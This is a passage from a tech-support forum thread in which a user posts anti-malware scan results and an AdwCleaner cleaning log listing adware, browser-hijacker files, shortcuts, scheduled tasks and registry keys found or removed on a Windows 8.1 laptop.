    [Adw.FakeBro][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Ghokswa][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Hj.Shortcut][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\?ozilla ?ire?ox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Gen0][File] C:\Windows\SECOH-QAD.exe -> Found
    [PUP.Yac][File] C:\Windows\System32\drivers\iSafeNetFilter.sys -> Found
    [PUP.AMule][Folder] C:\Users\User\AppData\Roaming\aMule -> Found
    [PUP.Gen1][Folder] C:\Users\User\AppData\Roaming\Elex-tech -> Found
    [PUP.Ghokswa][Folder] C:\Users\User\AppData\Roaming\Firefox -> Found
    [Adw.Elex][Folder] C:\Users\User\AppData\Roaming\Kyubey -> Found
    [PUP.Gen1][Folder] C:\Users\User\AppData\Roaming\RPEng -> Found
    [PUP.Gen0][Folder] C:\Users\User\AppData\Roaming\WinSAPSvc -> Found
    [Adw.Elex][Folder] C:\Users\User\AppData\Roaming\WinSnare -> Found
    [PUP.Gen1][Folder] C:\Users\User\AppData\Roaming\WinZiper -> Found
    [PUP.Ghokswa][Folder] C:\Users\User\AppData\Local\Firefox -> Found
    [Tr.Eroyee][File] C:\Users\User\AppData\Local\Temp\lgE2D94.tmp\Kyubey.exe -> Found
    [Tr.Eroyee][File] C:\Users\User\AppData\Local\Temp\lgEEF7A.tmp\Kyubey.exe -> Found
    [PUP.Gen0][Folder] C:\ProgramData\ChelfNotify -> Found
    [PUP.QRss][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BikaQ -> Found
    [PUP.Ghokswa][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Gen0|PUP.Gen1][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall.lnk [LNK@] C:\PROGRA~2\WINZIP~1\WZUNIN~1.EXE -> Found
    [PUP.Gen1][Folder] C:\ProgramData\Tencent -> Found
    [PUP.Gen0][Folder] C:\ProgramData\WinSAPSvc -> Found
    [Adw.Elex][Folder] C:\ProgramData\wintools -> Found
    [PUP.AMule][Folder] C:\Program Files (x86)\amuleC2 -> Found
    [PUP.AMule][Folder] C:\Program Files (x86)\amuleCexx -> Found
    [PUP.AMule|PUP.Amulell][Folder] C:\Program Files (x86)\amulell -> Found
    [PUP.QRss][Folder] C:\Program Files (x86)\BikaQRssReader -> Found
    [PUP.Bili][Folder] C:\Program Files (x86)\bilibili -> Found
    [PUP.Gen1][Folder] C:\Program Files (x86)\Elex-tech -> Found
    [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer -> Found
    [PUP.Ghokswa][Folder] C:\Program Files (x86)\Firefox -> Found
    [Adw.Elex][File] C:\Program Files (x86)\Gub\GubZL.dll -> Found
    [Adw.Elex][File] C:\Program Files (x86)\Gubed\GubedZL.dll -> Found
    [PUP.Gubed][Folder] C:\Program Files (x86)\Gubed_WMI -> Found
    [PUP.Gen0][Folder] C:\Program Files (x86)\InterHop -> Found
    [PUP.Gen3][File] C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\GoSearch.xml -> Found
    [Adw.Trotux][Folder] C:\Program Files (x86)\Tafleclwther -> Found
    [PUP.WinArcher|PUP.Gen0][Folder] C:\Program Files (x86)\WinArcher -> Found
    [PUP.Gen0][Folder] C:\Program Files (x86)\WinSaber -> Found
    [PUP.Gen0|PUP.Gen1][Folder] C:\Program Files (x86)\WinZipper -> Found
    [Adw.FakeBro][File] C:\Users\Public\Desktop\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Ghokswa][File] C:\Users\Public\Desktop\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Amisites][File] C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\amisites.xml -> Found
    [PUP.Gen3][File] C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\Palikan.xml -> Found
    [PUP.StartPageIng][File] C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\startpageing123.xml -> Found
    [Adw.FakeBro][File] C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found

    ¤¤¤ WMI : 0 ¤¤¤

    ¤¤¤ Hosts File : 0 ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

    ¤¤¤ Web browsers : 5 ¤¤¤
    [PUM.HomePage][Firefox:Config] xt4h78mw.default : user_pref("browser.startup.homepage", "http://www.luckysearch123.com?type=...&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"); -> Found
    [PUM.NewTab][Firefox:Config] xt4h78mw.default : user_pref("browser.newtab.url", "http://www.luckysearch123.com?type=...&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"); -> Found
    [PUM.SearchEngine][Firefox:Config] xt4h78mw.default : user_pref("browser.search.selectedEngine", "nice"); -> Found
    [PUM.SearchEngine][Firefox:Config] xt4h78mw.default : user_pref("browser.search.defaultenginename", "nice"); -> Found
    [PUM.SearchEngine][Firefox:Config] xt4h78mw.default : user_pref("browser.search.searchengine.url", "http://www.luckysearch123.com/searc...7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"); -> Found

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: TOSHIBA MQ01ABF050 +++++
    --- User ---
    [MBR] 66cf109dc3693310c623ece1293456ef
    [BSP] fd87b8d8802a5f0544f6f6feb573659c : Empty|VT.Unknown MBR Code
    Partition table:
    0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 100 MB
    1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 206848 | Size: 900 MB
    2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 2050048 | Size: 128 MB
    3 - Basic data partition | Offset (sectors): 2312192 | Size: 190774 MB
    4 - Basic data partition | Offset (sectors): 393017344 | Size: 269667 MB
    5 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 945295360 | Size: 15370 MB
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: Generic USB Flash Disk USB Device +++++
    --- User ---
    [MBR] 7585ee7e24514ad66055ebd0066ae34b
    [BSP] 7208b105e661849d4a48c279d3177d8d : Legit.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] FAT16-LBA (0xe) [VISIBLE] Offset (sectors): 63 | Size: 37 MB
    User = LL1 ... OK
    Error reading LL2 MBR! ([32] The request is not supported. )

    +++++ PhysicalDrive2: Generic USB Flash Disk USB Device +++++
    --- User ---
    [MBR] 3c9e59f19b253ef396ba517d4a32b1e2
    [BSP] d70d9c1031359407e6a8ce0be4028301 : Unknown|VT.Unknown MBR Code
    Partition table:
    0 - [XXXXXX] UNKNOWN (0x68) [VISIBLE] Offset (sectors): 1936028272 | Size: 904228 MB
    1 - [XXXXXX] UNKNOWN (0x79) [VISIBLE] Offset (sectors): 1330184192 | Size: 263172 MB
    2 - [XXXXXX] DISKMNG (0x53) [VISIBLE] Offset (sectors): 538989391 | Size: 682794 MB
    3 - [XXXXXX] UNKNOWN (0x49) [VISIBLE] Offset (sectors): 1394627663 | Size: 10 MB
    User = LL1 ... OK
    Error reading LL2 MBR! ([32] The request is not supported. )
     
  12. 2017/03/15
    scgoh123 Well-Known Member Thread Starter

    # AdwCleaner v6.044 - Logfile created 15/03/2017 at 14:04:22
    # Updated on 28/02/2017 by Malwarebytes
    # Database : 2017-03-15.1 [Local]
    # Operating System : Windows 8.1 Single Language (X64)
    # Username : User - ASUS
    # Running from : F:\AdwCleaner.exe
    # Mode: Clean
    # Support : Customer Support & Help Center



    ***** [ Services ] *****



    ***** [ Folders ] *****

    [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent
    [-] Folder deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default


    ***** [ Files ] *****

    [-] File deleted: C:\Windows\SysNative\log\iSafeKrnlCall.log
    [-] File deleted: C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
    [-] File deleted: C:\Program Files (x86)\settings.dat
    [-] File deleted: C:\Users\Public\Documents\cfg.ini
    [-] File deleted: C:\Users\Public\Documents\cc.ini
    [-] File deleted: C:\Users\Public\Documents\temp.dat
    [-] File deleted: C:\Users\Public\Documents\report.dat
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\palikan.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\nice.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\nice.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\mylucky123.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\searchinme.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\SEARCHPLUGINS\searchinme.xml


    ***** [ DLL ] *****



    ***** [ WMI ] *****



    ***** [ Shortcuts ] *****

    [-] Shortcut disinfected: C:\Users\Public\Desktop\Google Chrome.lnk
    [-] Shortcut disinfected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\f73cfe270e0a8f33\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\c5ecd897b04d4fe6\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\b216584368a76cee\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\513998e1b006ffdf\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4f572ee5bdaa3aca\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\276bc18f565c8259\Google Chrome.lnk


    ***** [ Scheduled Tasks ] *****

    [-] Task deleted: Milimili
    [-] Task deleted: BikaQ_FetchAndUpgrade_CanBeDel


    ***** [ Registry ] *****

    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.001
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.7z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.arj
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bzip2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cab
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cpio
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.deb
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.dmg
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.fat
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gzip
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.hfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.iso
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lha
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzh
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzma
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.ntfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rpm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.squashfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.swm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.taz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tgz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tpz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.txz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.vhd
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.wim
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.zip
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKU\.DEFAULT\Software\ompndb
    [-] Key deleted: HKU\.DEFAULT\Software\jhdbca
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\PRODUCTSETUP
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\ompndb
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\jhdbca
    [#] Key deleted on reboot: HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: HKCU\Software\PRODUCTSETUP
    [-] Key deleted: HKLM\SOFTWARE\Elex-tech
    [-] Key deleted: HKLM\SOFTWARE\hdcode
    [-] Key deleted: HKLM\SOFTWARE\trotuxSoftware
    [-] Key deleted: HKLM\SOFTWARE\ScreenShot
    [-] Key deleted: HKLM\SOFTWARE\WinZiper
    [-] Key deleted: HKLM\SOFTWARE\WinSaberSvc
    [-] Key deleted: HKLM\SOFTWARE\ompndb
    [-] Key deleted: HKLM\SOFTWARE\jhdbca
    [-] Key deleted: HKLM\SOFTWARE\InterHop
    [-] Key deleted: HKLM\SOFTWARE\WinArcher
    [-] Key deleted: HKLM\SOFTWARE\amule-custom
    [-] Key deleted: HKLM\SOFTWARE\mylucky123Software
    [-] Key deleted: HKLM\SOFTWARE\amisitesSoftware
    [-] Key deleted: HKLM\SOFTWARE\startpageing123Software
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A0275D4F-FFAB-4A42-9874-B871B1C4CA3D}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19539992-061C-4E8B-9053-07B175303AF4}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{418DDAC3-E16C-47C2-B5FE-4FBCAB0E10D0}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{56B2B28A-E663-4D28-84A3-3846068A7D63}
    [-] Key deleted: HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [#] Key deleted on reboot: [x64] HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: [x64] HKCU\Software\PRODUCTSETUP
    [-] Key deleted: [x64] HKLM\SOFTWARE\ompndb
    [-] Key deleted: [x64] HKLM\SOFTWARE\jhdbca
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-3023424667-1579791547-2771295078-1001\Products\3CADD814C61E2C745BEFF4CBBAE0010D
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFA0118CE95AE0D70F14E7E8A72452C8
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
